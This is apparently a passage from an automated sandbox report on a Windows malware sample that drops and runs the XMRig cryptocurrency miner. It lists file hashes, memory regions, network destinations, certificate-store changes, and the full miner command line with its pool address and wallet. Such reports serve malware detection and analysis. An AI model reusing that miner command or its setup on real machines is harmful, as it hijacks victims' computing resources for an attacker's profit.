| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2688-14-0x0000026A9EC00000-0x0000026A9EC20000-memory.dmp
memory/2688-15-0x0000026AA0410000-0x0000026AA0430000-memory.dmp
memory/2688-16-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-18-0x0000026AA0430000-0x0000026AA0450000-memory.dmp
memory/2688-17-0x0000026AA0450000-0x0000026AA0470000-memory.dmp
memory/2688-19-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-20-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-21-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-22-0x0000026AA0450000-0x0000026AA0470000-memory.dmp
memory/2688-23-0x0000026AA0430000-0x0000026AA0450000-memory.dmp
memory/2688-24-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-25-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-26-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-27-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-28-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-29-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-30-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-31-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-32-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-33-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-34-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-35-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-36-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-37-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-38-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-39-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-40-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-41-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-42-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-43-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-44-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-45-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-46-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-47-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-48-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-49-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-50-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-51-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-52-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-53-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-54-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-55-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-56-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-57-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-58-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-59-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-60-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-61-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-62-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-63-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-64-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-65-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-66-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-67-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-68-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-69-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-70-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-71-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-72-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-73-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-74-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-75-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-76-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-77-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-78-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-79-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-80-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-81-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
memory/2688-82-0x00007FF70BD30000-0x00007FF70C833000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4720 wrote to memory of 2524 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4720 wrote to memory of 2524 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| BE | 88.221.83.209:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.117.168.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2524-14-0x000001A853850000-0x000001A853870000-memory.dmp
memory/2524-15-0x000001A853890000-0x000001A8538B0000-memory.dmp
memory/2524-16-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-18-0x000001A855060000-0x000001A855080000-memory.dmp
memory/2524-17-0x000001A855080000-0x000001A8550A0000-memory.dmp
memory/2524-19-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-20-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-21-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-22-0x000001A855080000-0x000001A8550A0000-memory.dmp
memory/2524-23-0x000001A855060000-0x000001A855080000-memory.dmp
memory/2524-24-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-25-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-26-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-27-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-28-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-29-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-30-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-31-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-32-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-33-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-34-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-35-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-36-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-37-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-38-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-39-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-40-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-41-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-42-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-43-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-44-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-45-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-46-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-47-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-48-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-49-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-50-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-51-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-52-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-53-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-54-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-55-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-56-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-57-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-58-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-59-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-60-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-61-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-62-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-63-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-64-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-65-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-66-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-67-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-68-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-69-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-70-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-71-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-72-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-73-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-74-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-75-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-76-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-77-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-78-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-79-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-80-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-81-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
memory/2524-82-0x00007FF6203C0000-0x00007FF620EC3000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240508-en
Max time kernel
1704s
Max time network
1716s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-13 07:36
Reported
2024-06-13 08:18
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1799s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4500,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3776,i,9746875443948590908,1444894342962555245,262144 --variations-seed-version --mojo-platform-channel-handle=4236 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |